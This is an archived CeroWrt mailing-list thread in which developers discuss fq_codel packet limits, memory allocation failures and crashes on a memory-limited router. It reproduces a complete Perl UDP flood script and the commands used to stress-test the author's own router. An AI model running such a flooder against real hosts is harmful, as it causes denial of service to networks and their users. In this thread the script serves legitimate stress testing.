Re: [Cerowrt-devel] Coping with router memory limitations in fq_codel

Sebastian Moeller Mon, 20 Aug 2012 12:55:35 -0700

Hi Dave,

sorry for accidentally taking this private, so here it is again.



On Aug 20, 2012, at 12:41 PM, Sebastian Moeller wrote:

> Hi Dave,
> 
> thanks for the long and thoughtful response.
> 
> 
> On Aug 20, 2012, at 12:12 PM, Dave Taht wrote:
> 
>> Dear Sebastian:
>> 
>> In addition to your udp flooding DoS attack, I attacked cero also by
>> using diffserv marking in netperf (-Y codepoint,codepoint) to saturate
>> all 4 wifi fq_codel queues, and also would get the router to have
>> memory allocation failures and ultimately crash in the same way you
>> are crashing it. I can similarly do what you just did with rtp
>> flooding. You are correct that codel is tuned for tcp, and that
>> fq_codel by maintaining many queues is even more susceptible to a
>> tuned udp flooding attack on a memory limited device such as this.
> 
>       Ah, I did not think that I had reported anything new with regard to 
> crashing the router; it was more that I had found a way to reproduce it without 
> netperf/iperf (which I never really got to run, due to a lack of endpoints) 
> as well as without using http://broadband.mpi-sws.org/residential/ (as this 
> only allows around 5 runs per 24-hour period).
> 
>> 
>> I tried to cope with this in 3.3.8-10/11 by reducing the packet
>> limits, which helped a lot. Unfortunately the settings I used then
>> were below codel's reaction time, which invoked "interesting" tail
>> drop behavior, so I arbitrarily doubled them in -17. To invoke more of
>> the kind of problems you are encountering…
> 
>       That would be limit 600? Is 600 a problem for a single flow, or is it due to 
> the limit applying to the sum of all flows? Would an additional per-flow limit be 
> able to help deal with this issue?
> 
>> 
>> 0) Since then I have been looking into ways to improve codel's
>> reaction time that are in the ns2 model presently, also fixing an
>> assumption about newton's method that didn't hold in reverse, and also
>> means to incorporate more aggressive codel behavior when queue limits
>> are near to being exceeded.
> 
>       I see, ramping up the drop frequency once space gets tight...
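
A rough sketch of that idea in Python. CoDel's published control law spaces successive drops by interval / sqrt(count), so drops come faster the longer the queue stays above target. The `pressured_gap_ms` variant is purely hypothetical (it is not taken from the Linux or ns2 code) and only illustrates what "more aggressive near the limit" could mean. The 100 ms interval is the usual CoDel default and is assumed here.

```python
import math

INTERVAL_MS = 100.0  # usual CoDel default interval (assumed here)


def next_drop_gap_ms(count, interval_ms=INTERVAL_MS):
    """Standard CoDel control law: the gap to the next drop shrinks as 1/sqrt(count)."""
    return interval_ms / math.sqrt(count)


def pressured_gap_ms(count, qlen, limit, interval_ms=INTERVAL_MS):
    """Hypothetical variant: shrink the gap further as the queue nears its packet limit.

    With an empty queue this equals the standard law; with a full queue the gap
    is 0, i.e. every packet becomes a drop candidate.
    """
    fill = min(max(qlen / limit, 0.0), 1.0)  # fraction of the packet limit in use
    return next_drop_gap_ms(count, interval_ms) * (1.0 - fill)


if __name__ == "__main__":
    for count in (1, 4, 16):
        print(count, next_drop_gap_ms(count),
              pressured_gap_ms(count, qlen=900, limit=1200))
```

The linear scaling is only one possible choice; anything that tightens the drop spacing before the hard limit turns into tail drop would serve the same purpose.
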
> 
>> 
>> Unfortunately as the memory pressure problem starts in the driver,
>> it's not communicated up the stack to where it could be controlled
>> better…
> 
>       Argh, sounds like fun :)
> 
>> 
>> 0) I would like to avoid having to determine whether a queue is tcp or
>> "other", and then having different kinds of drop strategies for each.
>> That said, it seems possible to implement that…
> 
>       Since the flows are filled by hash, a flow might contain both, correct? 
> So being firmer with flows that contain non-TCP traffic might hurt some TCP in 
> shared bins.
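
To make the shared-bin concern concrete, here is a small Python model. It assumes 1024 bins (fq_codel's default flow count) and uses crc32 purely as a stand-in for the kernel's real flow hash; the addresses and ports are made up for illustration.

```python
import zlib

N_BINS = 1024  # fq_codel's default number of flow queues


def bin_for(proto, src, sport, dst, dport, n_bins=N_BINS):
    """Map a 5-tuple to a bin. crc32 is a stand-in; the kernel uses its own hash."""
    key = f"{proto}|{src}|{sport}|{dst}|{dport}".encode()
    return zlib.crc32(key) % n_bins


def mixed_bins(flows, n_bins=N_BINS):
    """Return the set of bins that hold at least one TCP and one non-TCP flow."""
    protos_per_bin = {}
    for flow in flows:
        protos_per_bin.setdefault(bin_for(*flow, n_bins=n_bins), set()).add(flow[0])
    return {b for b, protos in protos_per_bin.items()
            if "tcp" in protos and len(protos) > 1}


if __name__ == "__main__":
    # Made-up traffic: a few TCP flows plus a UDP flood over many destination ports.
    tcp = [("tcp", "172.30.42.10", 40000 + i, "192.0.2.1", 80) for i in range(20)]
    udp = [("udp", "172.30.42.10", 5000, "192.168.100.1", p) for p in range(1, 5001)]
    shared = mixed_bins(tcp + udp)
    print(f"{len(shared)} of {N_BINS} bins carry both TCP and UDP")
```

With a random-port flood there are far more UDP flows than bins, so any per-bin policy that is harsher on non-TCP traffic would plausibly also hit TCP flows that happen to hash into the same bin.
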
> 
>> 
>> 1) A workaround of sorts for the 64MB 3700v2 has been to give up on
>> named and get some memory back that way.
> 
>       Since I am a layman, what is the quick and dirty (and reversible) way 
> to do so, so I can test this?
> 
>> 
>> 2) I believe, but am not sure, that Linux 3.6(5?) has some stuff in it
>> to get skb memory allocations done more efficiently. Eric and I and
>> felix had talked about it, I don't know what was implemented.
> 
>       ISTR there was something about fixing the accounting of drivers so they 
> track all buffers and not just part of the payload (truesize was the word). 
> Which totally went over my head, but sounds like something that might help...
> 
>> 
>> 3) It may be possible to improve how the memory allocations from the
>> 2048 slab work in general. I imagine that half of memory is being
>> wasted on big packets otherwise.
> 
>       I had a quick look at the SLUB documentation and see no way to do so that I 
> can understand.
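
For a feel of the numbers, a back-of-the-envelope calculation in Python using only figures from this thread: the 2048-byte slab, the packet limits of 600, 1200 and the 10k default, four wifi queues, and 64MB of RAM. Treating each queued packet as exactly one 2048-byte slab object is an assumption; real skbs carry additional overhead, so these are lower bounds.

```python
SLAB_BYTES = 2048    # slab size mentioned in the thread; real skbs cost more
ROUTER_RAM_MB = 64   # the 3700v2 discussed in this thread


def worst_case_mb(packet_limit, n_queues=1, bytes_per_packet=SLAB_BYTES):
    """Lower-bound memory (in MiB) if every queue fills up to its packet limit."""
    return packet_limit * n_queues * bytes_per_packet / (1024 * 1024)


if __name__ == "__main__":
    for limit in (600, 1200, 10000):
        mb = worst_case_mb(limit, n_queues=4)  # 4 wifi hardware queues
        print(f"limit {limit:>5}: {mb:6.1f} MiB of {ROUTER_RAM_MB} MiB")
```

Under these assumptions four full queues hold roughly 4.7 MiB at limit 600, 9.4 MiB at limit 1200, and about 78 MiB at 10k packets, which is more than the router has in total.
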
> 
>> 
>> 4) Some options for improving fq_codel for more memory-constrained
>> home environments.
>> 
>> 4a) On the wifi front (as well as other devices with multiple hardware
>> queues), I envision something like "mfq_codel", which would have an
>> overall similar packet limit to a single fq_codel, but be able to
>> deliver (and fair queue) packets to the underlying hardware queues
>> independently.
> 
>       Sounds like something to test I guess (but out of my league)
> 
>> 
>> 4b) On the home to-ISP gateway qos front, a rate limited (tbf)
>> mfq_codel with 2-4 queues would replace the complexity of hfsc or htb
>> with a default qdisc that "just worked" without any scripting. It
>> could be mildly more responsive (htb buffers up some data and has its
>> own notion of time and quantums), thus cpu and memory usage would be
>> lower than htb + multiple fq_codel queues.
> 
>       But I thought that being able to arbitrarily prioritize some traffic in 
> a home router is a good thing; and that will require some hierarchical system 
> and will bring along some complexity...
> 
> 
>> 
>> Getting something that scaled down to 10s of kbits and up to gigabits
>> would be hard, tho. HTB needs to be tuned when running lower or higher
>> than its original operating range, presently, and that is where, in
>> part, the simple_qos.sh effort is "stuck".
> 
>       Can't this be divined from the configured up- and downlink rates? Or 
> are you thinking about dynamic changes in link rates?
> 
>> 
>> 4c) Another thought would be to have a weighted packet (to handle
>> classification) oriented sfq codel or qfq_codel rather than separate
>> fq_codel queues that are each byte-aware... we have CPU to burn, but
>> not memory…
> 
>       That I admit I do not understand.
> 
> Thanks a lot & best regards
>       Sebastian
> 
>> 
>> On Mon, Aug 20, 2012 at 11:24 AM, Sebastian Moeller <moell...@gmx.de> wrote:
>>> Hi Dave,
>>> 
>>> so I went to play around with this a bit more. I turned to UDP flooding my 
>>> cable modem through the router and this surely allows me to create enough 
>>> load on the wndr3700v2 to cause the allocation errors and as a "bonus" also 
>>> to drive the router to reboot (driven by the watchdog timer?). Here is the 
>>> script I used over 5GHz wireless (from 
>>> http://blog.ioshints.info/2008/03/udp-flood-in-perl.html)
>>> 
>>> #!/usr/bin/perl
>> 
>> It would be nice to have a C or lua version of this sort of test.
>> 
>>> ##############
>>> 
>>> # udp flood.
>>> ##############
>>> 
>>> use Socket;
>>> use strict;
>>> 
>>> if ($#ARGV != 3) {
>>>   print "flood.pl <ip> <port> <size> <time>\n\n";
>>>   print " port=0: use random ports\n";
>>>   print " size=0: use random size between 64 and 1024\n";
>>>   print " time=0: continuous flood\n";
>>>   exit(1);
>>> }
>>> 
>>> my ($ip,$port,$size,$time) = @ARGV;
>>> 
>>> my ($iaddr,$endtime,$psize,$pport);
>>> 
>>> $iaddr = inet_aton("$ip") or die "Cannot resolve hostname $ip\n";
>>> $endtime = time() + ($time ? $time : 1000000);
>>> 
>>> socket(flood, PF_INET, SOCK_DGRAM, 17);
>>> 
>>> 
>>> print "Flooding $ip " . ($port ? $port : "random") . " port with " .
>>> ($size ? "$size-byte" : "random size") . " packets" .
>>> ($time ? " for $time seconds" : "") . "\n";
>>> print "Break with Ctrl-C\n" unless $time;
>>> 
>>> for (;time() <= $endtime;) {
>>>   $psize = $size ? $size : int(rand(1024-64)+64) ;
>>>   $pport = $port ? $port : int(rand(65500))+1;
>>> 
>>>   send(flood, pack("a$psize","flood"), 0, pack_sockaddr_in($pport, $iaddr));
>>> }
>>> 
>>> called as either
>>> udp_flood.pl 192.168.100.1 0 1024 240
>>> or
>>> udp_flood.pl 192.168.100.1 32000 1024 240
>>> 
>>> The first version with randomized port number spreads the load nicely over 
>>> many fq_codel bins/flows and seems slightly more likely to cause allocation 
>>> errors and reboots than the 2nd invocation which restricts itself to port 
>>> 32000 and presumably just one flow.
>>>       I wonder how to make cerowrt survive this kind of stress test…
>>> 
>>> best
>>>       Sebastian
>>> 
>>> 
>>> On Aug 15, 2012, at 9:08 PM, Dave Taht wrote:
>>> 
>>>> re: ath: skbuff alloc of size 1926 failed
>>>> 
>>>> as for the ath skbuff problem, I've seen that a lot. I had put hard
>>>> packet limits (~600) on fq_codel in -11 and prior that were too low
>>>> and it mostly went away, but I hit tail drop behavior everywhere,
>>>> instead of codel behavior. What I have now (typically 1200) may well
>>>> be too high, but not as overly high as the default (10k packets).
>>>> There may be another means of increasing the size of that slab pool or
>>>> making it less onerous.
>>>> 
>>>> I would like it if codel "kicked in" earlier than it currently does.
>>>> The code in ns2 is currently using half the period that the linux code
>>>> is. This would control things better, or so I hope (planning on trying
>>>> this as I get time)
>>>> 
>>>> I am also considering means of artificially upscaling the drop
>>>> scheduler when we get close to queue limits.
>>>> 
>>>> See some discussions on the codel list for these issues. (sims are
>>>> easier to deal with than cerowrt, too!)
>>>> 
>>>> as for bind, it should be automagically restarted from xinetd, no need
>>>> to fiddle with anything. However, since you are already under massive
>>>> memory pressure, it may well fail to start up that way, too. At the
>>>> moment, I've largely given up on bind on anything but a more core home
>>>> gw, and am running dnsmasq on everything (3700v2, picostations,
>>>> nanostations) but the 3800s. (and the ones I run it on, aren't being
>>>> used for wifi right now).
>>>> 
>>>> Lastly: Swap space won't help you on exhausting kernel limits.
>>>> 
>>>> I'm glad you can reproduce the ath: slab problem - I can get it too at
>>>> high rates using netperf over wifi. I will try a 3700v2 with and
>>>> without bind to see if it's still there in 3.3.8-17. In the meantime
>>>> if anyone knows how to get more allocations in that (2048? 4096?) slab
>>>> by default, perhaps that will help?
>>>> 
>>>> 
>>>> 
>>>> On Wed, Aug 15, 2012 at 10:23 AM, Sebastian Moeller <moell...@gmx.de> 
>>>> wrote:
>>>>> Hi Dave,
>>>>> 
>>>>> great work, as always. I upgraded my production router to the latest and 
>>>>> greatest (since I only have one router…). And it works quite well for 
>>>>> normal usage…
>>>>> Netalyzr reports around 2800 ms of uplink buffering, yet 
>>>>> saturating the uplink does not affect ping times to a remote target 
>>>>> noticeably, basically the same as for all codellized cero versions I 
>>>>> tested so far...
>>>>> 
>>>>> Some notes and a question:
>>>>> I noticed that even given plenty of swap space (1GB on a usb stick), 
>>>>> using http://broadband.mpi-sws.org/residential/ to exercise UDP stress 
>>>>> (on the uplink I assume) I can easily produce (I run the test from a 
>>>>> macosx via 5GHz wireless over 1.5 yards):
>>>>> Aug 15 01:16:29 nacktmulle kern.err kernel: [175395.132812] ath: skbuff alloc of size 1926 failed
>>>>> (and plenty of those…).
>>>>> What then happens is that the OOM killer will aim for bind (reasonable 
>>>>> since it is the largest single process) and kill it. When I try to 
>>>>> restart bind by:
>>>>> root@nacktmulle:~# /etc/rc.d/S47namedprep start
>>>>> root@nacktmulle:~# /etc/rc.d/S48named restart
>>>>> Stopping isc-bind
>>>>> /etc/chroot/named//var/run/named/named.pid not found, trying brute force
>>>>> killall: named: no process killed
>>>>> Kicking isc-bind in xinetd
>>>>> rndc: connect failed: 127.0.0.1#953: connection refused
>>>>> And bind does not start again and the router becomes less than useful. 
>>>>> Now I assume I am doing something wrong, but what? If you have any idea 
>>>>> how to solve this short of rebooting the router (my current method), I 
>>>>> would be happy to learn.
>>>>> 
>>>>> 
>>>>> 
>>>>> best regards
>>>>>      sebastian
>>>>> 
>>>>> On Aug 12, 2012, at 11:08 PM, Dave Taht wrote:
>>>>> 
>>>>>> I'm too tired to write up a full set of release notes, but I've been
>>>>>> testing it all day, and it looks better than -10 and certainly better
>>>>>> than -11, but I won't know until some more folk sit down and test it,
>>>>>> so here it is.
>>>>>> 
>>>>>> http://huchra.bufferbloat.net/~cero1/3.3/3.3.8-17/
>>>>>> 
>>>>>> fresh merge with openwrt, fix to a bind CVE, fixes for 6in4 and quagga
>>>>>> routing problems, and a few tweaks to fq_codel setup that might make
>>>>>> voip better.
>>>>>> 
>>>>>> Go forth and break things!
>>>>>> 
>>>>>> In other news:
>>>>>> 
>>>>>> Van Jacobson gave a great talk about bufferbloat, BQL, codel, and
>>>>>> fq_codel at last week's ietf meeting. Well worth watching. At the end
>>>>>> he outlines the deployment problems in particular.
>>>>>> 
>>>>>> http://recordings.conf.meetecho.com/Recordings/watch.jsp?recording=IETF84_TSVAREA&chapter=part_3
>>>>>> 
>>>>>> Far more interesting than this email!
>>>>>> 
>>>>>> 
>>>>>> --
>>>>>> Dave Täht
>>>>>> http://www.bufferbloat.net/projects/cerowrt/wiki - "3.3.8-17 is out
>>>>>> with fq_codel!"
>>>>>> _______________________________________________
>>>>>> Cerowrt-devel mailing list
>>>>>> Cerowrt-devel@lists.bufferbloat.net
>>>>>> https://lists.bufferbloat.net/listinfo/cerowrt-devel
>>>>> 
>>>> 
>>> 
>> 
> 
